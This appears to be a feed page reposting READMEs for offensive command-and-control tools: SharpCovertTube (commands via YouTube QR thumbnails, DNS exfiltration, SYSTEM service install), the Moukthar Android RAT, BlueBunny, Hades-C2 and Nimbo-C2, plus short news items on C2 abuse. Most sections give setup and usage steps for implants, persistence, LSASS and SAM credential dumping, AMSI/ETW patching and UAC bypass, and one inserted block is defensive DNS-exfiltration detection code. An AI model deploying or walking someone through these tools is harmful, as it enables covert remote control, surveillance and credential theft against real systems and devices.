FreshRSS


SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube

By: Zion3R


SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.

The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.

It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.



Usage

Run the listener in your Windows system:

It will check the Youtube channel at a configurable interval (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder example-videos:

After finding a new video in the channel, it decodes the QR code from the video thumbnail, executes the command, base64-encodes the response and exfiltrates it using DNS:

This also works for QR codes with AES-encrypted payloads and for longer command responses. In this example, the file "dirtemp_aes.avi" from example-videos is uploaded and the content of c:\temp is exfiltrated using several DNS queries:

Logging to a file is optional, but you must check that the folder for that file exists on the system; the default value is "c:\temp\.sharpcoverttube.log". DNS exfiltration is also optional and can be tested using Burp's Collaborator:

As an alternative, I created this repository with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.
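As an added example for the defender's side of the DNS exfiltration described above (detection code written here, not part of SharpCovertTube or the author's monitoring scripts), the following Python flags queries under the configured dns_hostname whose leftmost label looks like an encoded chunk and reassembles the chunks for the analyst. It assumes each query carries one standard-base64 chunk of the command output as a label, in query order, and runs over a constructed resolver log; the tool's actual on-the-wire encoding is not documented on this page.

```python
"""Detection helper for base64-style DNS exfiltration (added example, not part of SharpCovertTube).
Assumes one chunk of standard base64 output per query, carried as the leftmost label under the
exfil parent domain, in query order; log format "<ts> <client> <qname>" is constructed here."""
import base64
import binascii
import math
import re
from collections import defaultdict

# Page's default dns_hostname is ".test.org"; compare without the leading dot.
DEFAULT_PARENT = "test.org"
# Hostname-safe approximation of base64 / base64url label characters.
ENCODED_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]{16,63}$")
MIN_ENTROPY = 3.0  # bits/char; hostnames such as "mail" or "cdn-static" sit below this


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_suspicious_label(label: str) -> bool:
    """Long, base64-looking, high-entropy label: encoded data rather than a hostname."""
    return bool(ENCODED_LABEL.match(label)) and shannon_entropy(label) >= MIN_ENTROPY


def find_exfil_candidates(log_lines, parent=DEFAULT_PARENT):
    """Map client -> ordered list of suspicious subdomain chunks seen under parent."""
    hits = defaultdict(list)
    for line in log_lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        _ts, client, qname = parts
        qname = qname.rstrip(".")
        if not qname.lower().endswith("." + parent):
            continue
        subdomain = qname[: -(len(parent) + 1)]  # keep case: base64 is case-sensitive
        if is_suspicious_label(subdomain.split(".")[0]):
            hits[client].append(subdomain.replace(".", ""))
    return dict(hits)


def reassemble(chunks):
    """Best-effort decode of the concatenated chunks so the analyst can see what left the network."""
    blob = "".join(chunks)
    decoder = base64.urlsafe_b64decode if ("-" in blob or "_" in blob) else base64.b64decode
    try:
        return decoder(blob + "=" * (-len(blob) % 4)).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def build_sample_log():
    """Constructed resolver log: benign queries plus chunks of a constructed command output."""
    output = "Volume in drive C has no label.\r\n Directory of c:\\temp\r\n\r\nsecrets.txt\r\n"
    encoded = base64.b64encode(output.encode()).decode()
    chunks = [encoded[i:i + 32] for i in range(0, len(encoded), 32)]
    lines = ["2024-01-01T10:00:00Z 10.0.0.5 www.example.com",
             "2024-01-01T10:00:01Z 10.0.0.7 mail.test.org"]
    lines += [f"2024-01-01T10:00:{i + 2:02d}Z 10.0.0.5 {c}.test.org" for i, c in enumerate(chunks)]
    lines.append("2024-01-01T10:00:59Z 10.0.0.7 cdn-static.example.com")
    return lines, output
```

Feed real resolver or Collaborator logs to find_exfil_candidates() and pass each client's chunks to reassemble() to confirm what was exfiltrated.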


Configuration

There are some values you can change; you can find them in the Configuration.cs file of both the regular binary and the service binary. Only the first two have to be updated:

  • channel_id (Mandatory!!!): Get your Youtube channel ID from here.
  • api_key (Mandatory!!!): To get the API key create an application and generate the key from here.
  • payload_aes_key (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-character string.
  • payload_aes_iv (Optional. Default: "0000000000000000"): AES IV for decrypting QR codes (if using AES). It must be a 16-character string.
  • seconds_delay (Optional. Default: 600): Seconds of delay between checks for a newly uploaded video. If the value is too low you will exceed the API rate limit.
  • debug_console (Optional. Default: true): Show debug messages in console or not.
  • log_to_file (Optional. Default: true): Write debug messages in log file or not.
  • log_file (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.
  • dns_exfiltration (Optional. Default: true): Exfiltrate command responses through DNS or not.
  • dns_hostname (Optional. Default: ".test.org"): DNS hostname to exfiltrate the response from commands executed in the system.


Generating videos with QR codes

You can generate the videos from Windows using Python3. For that, first install the dependencies:

pip install Pillow opencv-python pyqrcode pypng pycryptodome rebus

Then run the generate_video.py script:

python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]
  • TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.

  • FILE (-f) is the path where the video is generated.

  • COMMAND (-c) is the command to execute in the system.

  • AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a 16-character string matching the one in the Program.cs file of SharpCovertTube.

  • AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a 16-character string matching the one in the Program.cs file of SharpCovertTube.


Examples

Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:

python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami

Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:

python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000



Running it as a service

You can find the code to run it as a service in the SharpCovertTube_Service folder. It has the same functionalities except self-deletion, which would not make sense in this case.

It is possible to install it with InstallUtil; it is prepared to run as the SYSTEM user, and you need to install it as administrator:

InstallUtil.exe SharpCovertTube_Service.exe

You can then start it with:

net start "SharpCovertTube Service"

In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you cannot install services, so you can only use the ordinary binary.


Notes
  • The file must be 64-bit!!! This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's QR-Capture project, who borrowed part of it from Uzi Granot's QRCode project, who in turn borrowed part of it from Zakhar Semenov's Camera_Net project (then I lost track). So thanks to all of them!

  • This project is a port of covert-tube, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about the Casbaneiro and Numando malware.



Moukthar - Android Remote Administration Tool

By: Zion3R


Remote administration tool for Android


Features
  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

Installation
  • Clone repository:
git clone https://github.com/Tomiwa-Ot/moukthar.git
  • Move server files to /var/www/html/ and install dependencies:
mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web\ socket/
composer install
    The default credentials are username: android and password: the rastafarian in you
  • Set database credentials in c2-server/.env and web socket/.env
  • Execute database.sql
  • Start the web socket server, or deploy it as a service on Linux:
php Server/web\ socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service
  • Modify /etc/apache2/apache2.conf:
<Directory /var/www/html/c2-server>
    Options -Indexes
    DirectoryIndex app.php
    AllowOverride All
    Require all granted
</Directory>
  • Set the C2 server and web socket server address in client functionality/Utils.java:
public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";
  • Compile the APK using Android Studio and deploy it to the target


TODO
  • Auto scroll logs on dashboard


BlueBunny - BLE Based C2 For Hak5's Bash Bunny

By: Zion3R


C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air.

Overview

Structure


Installation & Start

  1. Install required dependencies
pip install pygatt "pygatt[GATTTOOL]"

Make sure BlueZ is installed and gatttool is usable

sudo apt install bluez
  2. Download BlueBunny's repository (and switch into the correct folder)
git clone https://github.com/90N45-d3v/BlueBunny
cd BlueBunny/C2
  3. Start the C2 server
sudo python c2-server.py
  4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
  5. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (your Bash Bunny will light up green when it's ready to pair).

Manual communication with the Bash Bunny through Python

You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

Example Code

# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE

# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data is temporarily written to a file, so that multiple commands can be executed as in a payload script file)
d_type = "cmd"

# Initialize BunnyLE
BunnyLE.init()

# Connect to your Bash Bunny
bb = BunnyLE.connect()

# Send the data and let it execute
BunnyLE.send(bb, data, d_type)

Troubleshooting

Connecting your Bash Bunny doesn't work? Try the following instructions:

  • Try connecting a few more times
  • Check if your bluetooth adapter is available
  • Restart the system your C2 server is running on
  • Check if your Bash Bunny is running the BlueBunny payload properly
  • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

Bugs within BlueZ

The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kinds of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and stay calm if they show up.

  • Timeout after 5.0 seconds
  • Unknown error while scanning for BLE devices

Working on...

  • Remote shell access
  • BLE exfiltration channel
  • Improved connecting process

Additional information

As I said, BlueZ, the base for the Bluetooth part used in BlueBunny, is somewhat bug-prone. If you encounter any non-temporary bugs when connecting to the Bash Bunny, as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just some nice feedback.



Hades-C2 - Hades Basic Command And Control Server

By: Zion3R


Hades is a basic Command & Control server built using Python. It is currently extremely bare bones, but I plan to add more features soon. Features are a work in progress currently.


This is a project made (mostly) for me to learn Malware Development, Sockets, and C2 infrastructure setups. Currently, the server can be used for CTFs, but it is still a buggy mess with a lot of things that need to be ironed out.

I am working on a Web UI using Flask currently, so new features are being put on hold until then; if you face any issues then please be sure to create an issue.

Features

  • Windows Implant
    • Python Implant
    • Executable Implant
    • Powershell Cradle
  • Linux Implant
  • Basic Command & Control functionality
    • CMD Commands
    • BASH Commands
  • Basic Persistence
    • Linux Cronjob
    • Windows Registry Autorun

Getting Started

Help

Listener Commands
---------------------------------------------------------------------------------------

listeners -g --generate --> Generate Listener

Session Commands
---------------------------------------------------------------------------------------

sessions -l --list --> List Sessions
sessions -i --interact --> Interact with Session
sessions -k --kill <value> --> Kill Active Session

Payload Commands
---------------------------------------------------------------------------------------

winplant.py --> Windows Python Implant
exeplant.py --> Windows Executable Implant
linplant.py --> Linux Implant
pshell_shell --> Powershell Implant

Client Commands
---------------------------------------------------------------------------------------

persist / pt --> Persist Payload (After Interacting with Session)
background / bg --> Background Session
exit --> Kill Client Connection

Misc Commands
---------------------------------------------------------------------------------------

help / h --> Show Help Menu
clear / cls --> Clear Screen

Prerequisites

  • Python3 Pip
  • Colorama

Installation

git clone https://github.com/lavender-exe/Hades-C2.git
cd Hades-C2
# Windows
python install.py
# Linux
python3 install.py
python3 hades-c2.py

Server:

  1. Run the server using python hades-c2.py
  2. Run listeners -g / --generate to generate a listener
  3. Select the IP and Port for the listener

Implant:

  1. Create an implant using winplant.py, linplant.py or exeplant.py
  2. Run the implant on the target machine

Roadmap

See the open issues for a list of proposed features (and known issues).

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

  • If you have suggestions for adding or removing projects, feel free to open an issue to discuss it, or directly create a pull request after you edit the README.md file with necessary changes.
  • Please make sure you check your spelling and grammar.
  • Create individual PR for each suggestion.
  • Please also read through the Code Of Conduct before posting your first idea as well.

Creating A Pull Request

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

Future Plans

  • Better Implant Functions
  • Add more persistence methods
  • Add more command functionality
  • Use Nim/C++ to create cross-platform malware
  • Add more Quality of Life features
  • Flask Web Interface

License

Distributed under the MIT License. See LICENSE for more information.

Authors

  • Lavender - Nerd - Lavender - Created Project

Acknowledgements



Google Warns How Hackers Could Abuse Calendar Service as a Covert C2 Channel

Google is warning of multiple threat actors sharing a public proof-of-concept (PoC) exploit that leverages its Calendar service to host command-and-control (C2) infrastructure. The tool, called Google Calendar RAT (GCR), employs Google Calendar Events for C2 using a Gmail account. It was first published to GitHub in June 2023. "The script creates a 'Covert Channel' by exploiting the event

Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

By: Zion3R

About

Nimbo-C2 is yet another (simple and lightweight) C2 framework.

The Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR into the process). Nim is powerful, but interacting with Windows is much easier and more robust using Powershell, hence this combination. The Linux agent is slimmer and capable only of basic commands, including ELF loading using the memfd technique.

All server components are written in Python:

  • HTTP listener that manages the agents.
  • Builder that generates the agent payloads.
  • Nimbo-C2 is the interactive C2 component that rule'em all!

My work wouldn't be possible without the previous great work done by others, listed under credits.


Features

  • Build EXE, DLL, ELF payloads.
  • Encrypted implant configuration and strings using NimProtect.
  • Packing payloads using UPX and obfuscating the PE section names (UPX0, UPX1) to make detection and unpacking harder.
  • Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable by the config.jsonc).
  • Auto-completion in the C2 Console for convenient interaction.
  • In-memory Powershell commands execution.
  • File download and upload commands.
  • Built-in discovery commands.
  • Screenshot taking, clipboard stealing, audio recording.
  • Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
  • LSASS and SAM hives dumping.
  • Shellcode injection.
  • Inline .NET assemblies execution.
  • Persistence capabilities.
  • UAC bypass methods.
  • ELF loading using memfd in 2 modes.
  • And more !

Installation

Easy Way

  1. Clone the repository and cd in
git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2
  2. Build the docker image
docker build -t nimbo-dependencies .
  3. cd again into the source files and run the docker image interactively, expose port 80 and mount the Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux replace ${pwd} with $(pwd).
cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

Easier Way

git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies

Usage

First, edit config.jsonc for your needs.

Then run with: python3 Nimbo-C2.py

Use the help command for each screen, and tab completion.

Also, check the examples directory.

Main Window

Nimbo-C2 > help

--== Agent ==--
agent list -> list active agents
agent interact <agent-id> -> interact with the agent
agent remove <agent-id> -> remove agent data

--== Builder ==--
build exe -> build exe agent (-h for help)
build dll -> build dll agent (-h for help)
build elf -> build elf agent (-h for help)

--== Listener ==--
listener start -> start the listener
listener stop -> stop the listener
listener status -> print the listener status

--== General ==--
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Agent Window

Windows agent

Nimbo-2 [d337c406] > help

--== Send Commands ==--
cmd <shell-command> -> execute a shell command
iex <powershell-scriptblock> -> execute in-memory powershell command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <loal-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Discovery Stuff ==--
pstree -> show process tree
checksec -> check for security products
software -> check for installed software

--== Collection Stuff ==--
clipboard -> retrieve clipboard
screenshot -> retrieve screenshot
audio <record-time> -> record audio

--== Post Exploitation Stuff ==--
lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
sam -> dump sam,security,system hives using reg.exe (elevation required)
shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
warning: make sure the assembly doesn't call any exit function

--== Evasion Stuff ==--
unhook -> unhook ntdll.dll
amsi -> patch amsi out of the current process
etw -> patch etw out of the current process

--== Persistence Stuff ==--
persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)

--== Privesc Stuff ==--
uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique

--== Interaction stuff ==--
msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
speak <text> -> speak using sapi.spvoice com interface

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Linux agent

Nimbo-2 [51a33cb9] > help

--== Send Commands ==--
cmd <shell-command> -> execute a terminal command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Post Exploitation Stuff ==--
memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
implant mode: load the elf as a child process and return
task mode: load the elf as a child process, wait on it, and get its output when it's done
(pass the whole commandline as a single string using quotes)

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Limitations & Warnings

  • Even though the HTTP communication is encrypted, the 'user-agent' header is in plain text and carries the real agent id, which some products may flag as suspicious.
  • When using the assembly command, make sure your assembly doesn't call any exit function, because it will kill the agent.
  • The shellc command may unexpectedly crash or change the injected process's behavior; test the shellcode and the target process first.
  • The audio, lsass and sam commands temporarily save artifacts to disk before exfiltrating and deleting them.
  • Cleaning up the persist commands must be done manually.
  • Specify whether to keep or kill the initiating agent process in the uac commands. The die flag may leave you with no active agent (if the unelevated agent thinks that the UAC bypass was successful and it wasn't); keep should leave you with 2 active agents probing the C2, after which you should manually kill the unelevated one.
  • msgbox is blocking until the user presses the OK button.

Contribution

This software may be buggy or unstable in some use cases, as it is not being fully and constantly tested. Feel free to open issues and PRs, and contact me for any reason at (Gmail | Linkedin | Twitter).

Credits

  • OffensiveNim - Great resource that taught me a lot about leveraging Nim for implant tasks. Some of the Nimbo-C2 agent capabilities are basically wrappers around modified OffensiveNim examples.
  • Python-Prompt-Toolkit-3 - Awesome library for developing Python CLI applications. The Nimbo-C2 interactive console was developed using this.
  • ascii-image-converter - For the awesome Nimbo ascii art.
  • All those random people from Github & Stackoverflow whose code I copied & pasted.


Researchers Expose Over 80 ShadowPad Malware C2 Servers

As many as 85 command-and-control (C2) servers have been discovered supported by the ShadowPad malware since September 2021, with infrastructure detected as recently as October 16, 2022. That's according to VMware's Threat Analysis Unit (TAU), which studied three ShadowPad variants using TCP, UDP, and HTTP(S) protocols for C2 communications. ShadowPad, seen as a successor to PlugX, is a modular

A Growing Number of Malware Attacks Leveraging Dark Utilities 'C2-as-a-Service'

A nascent service called Dark Utilities has already attracted 3,000 users for its ability to provide command-and-control (C2) services with the goal of commandeering compromised systems. "It is marketed as a means to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems," Cisco Talos said in a report shared